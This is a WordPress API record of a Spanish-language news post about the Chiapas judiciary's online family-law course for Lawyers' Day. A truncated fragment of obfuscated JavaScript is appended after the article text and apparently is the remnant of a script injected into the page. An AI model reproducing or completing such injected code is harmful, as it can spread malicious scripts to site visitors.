{"id":3561,"date":"2022-07-13T03:09:35","date_gmt":"2022-07-13T03:09:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3561"},"modified":"2022-07-13T03:09:37","modified_gmt":"2022-07-13T03:09:37","slug":"conmemora-con-capacitacion-el-poder-judicial-dia-de-las-y-los-abogados","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3561","title":{"rendered":"Conmemora con capacitaci\u00f3n el Poder Judicial, D\u00eda de Las y Los abogados"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-3562\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-11-at-5.57.08-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>12 de Julio del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; Como parte de las actividades en conmemoraci\u00f3n del D\u00eda de las y los Abogados, el Poder Judicial de Chiapas, que encabeza el magistrado presidente Juan \u00d3scar Trinidad Palacios, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, realiz\u00f3 el curso en l\u00ednea Juicios Orales en Materia Familiar: Visi\u00f3n General y Consejo Pr\u00e1cticos.Este curso que imparti\u00f3 el juez Segundo de Proceso Oral en Materia Familiar del Poder Judicial de la Ciudad de M\u00e9xico, Eduardo Garc\u00eda Ram\u00edrez, se transmiti\u00f3 durante tres d\u00edas, del 5 al 07 de julio, por medio de la plataforma Facebook Live oficial del Poder Judicial del Estado de Chiapas.En este contexto el presidente del Poder Judicial del Estado de Chiapas Juan \u00d3scar Trinidad Palacios, mand\u00f3 un saludo a las y los abogados, reconoci\u00e9ndoles su quehacer en beneficio del pueblo de Chiapas y la comunidad jur\u00eddica nacional e internacional.\u201cEn el marco de la conmemoraci\u00f3n del D\u00eda de Las y Los Abogado, es para m\u00ed, un privilegio poder agradecer el trabajo de las mujeres y hombres profesionales del Derecho y con ello, renovar nuestro compromiso con la legalidad y la justicia de nuestro estado y pa\u00eds\u201d, dijo Trinidad Palacios.Chiapas requiere de abogados que est\u00e9n al d\u00eda y a la vanguardia, abogados actualizados, conscientes de los nuevos paradigmas que se est\u00e1n generando, por ello en el Poder Judicial insistimos en las capacitaciones y actualizaci\u00f3n constantes en la materia.Vamos a continuar promoviendo jornadas de capacitaci\u00f3n, porque concebimos al Derecho en constante dinamismo y en el ejercicio profesional de la abogac\u00eda debemos estar a la vanguardia para servir con mayor profesionalismo, concluy\u00f3.En el primer d\u00eda del curso gratuito, m\u00e1s de mil 200 asistentes conformados por integrantes de barras, colegios, profesionales, estudiantes de Derecho y del p\u00fablico en general, se conectaron e interactuaron con el juez, quien resolvi\u00f3 dudas principalmente acerca de las notificaciones, la adopci\u00f3n, la patria potestad, entre otros temas relacionados a la materia familiar.Durante el inicio de la primera sesi\u00f3n, el juez Eduardo Garc\u00eda Ram\u00edrez agradeci\u00f3 la invitaci\u00f3n que le hiciera el Poder Judicial para participar en esta actividad, donde consider\u00f3 un honor que se le tomar\u00e1 en cuenta para realizarla y dej\u00f3 en claro que su principal objetivo es compartir experiencias en el tema.Cabe destacar que el juez Eduardo Garc\u00eda Ram\u00edrez, tiene una extensa trayectoria en Tribunal Superior de Justicia de la Ciudad de M\u00e9xico, en donde se ha desempe\u00f1ado como: juez Trig\u00e9simo y Noveno de lo Familiar, Internacional en Restituci\u00f3n de Menores, juez Segundo de Proceso Oral Familiar de la Ciudad de M\u00e9xico, y actualmente, juez de Proceso Oral, con aplicaci\u00f3n de medidas de protecci\u00f3n para combatir la violencia en contra de las mujeres.Las tres sesiones de este curso, se mantendr\u00e1n publicadas de forma permanente en la p\u00e1gina www.facebook.com\/PJE.Chiapas, para que puedan ser consultadas por los interesados, y se expedir\u00e1n constancias de participaci\u00f3n para quienes acrediten las tres asistencias.Con estas acciones, el Poder Judicial refrenda su compromiso con el gremio de abogadas y abogados de Chiapas, as\u00ed como con la sociedad en general, al poner al alcance las herramientas necesarias para la actualizaci\u00f3n judicial, que derive en una mejor impartici\u00f3n de justicia para todas y todos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>12 de Julio del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; Como parte de las actividades en conmemoraci\u00f3n del D\u00eda de las y los Abogados, el Poder Judicial de Chiapas, que encabeza el magistrado presidente Juan \u00d3scar Trinidad Palacios, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, realiz\u00f3 el curso en l\u00ednea Juicios Orales en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3562,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3561","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3561","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3561"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3561\/revisions"}],"predecessor-version":[{"id":3563,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3561\/revisions\/3563"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3562"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3561"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3561"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3561"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}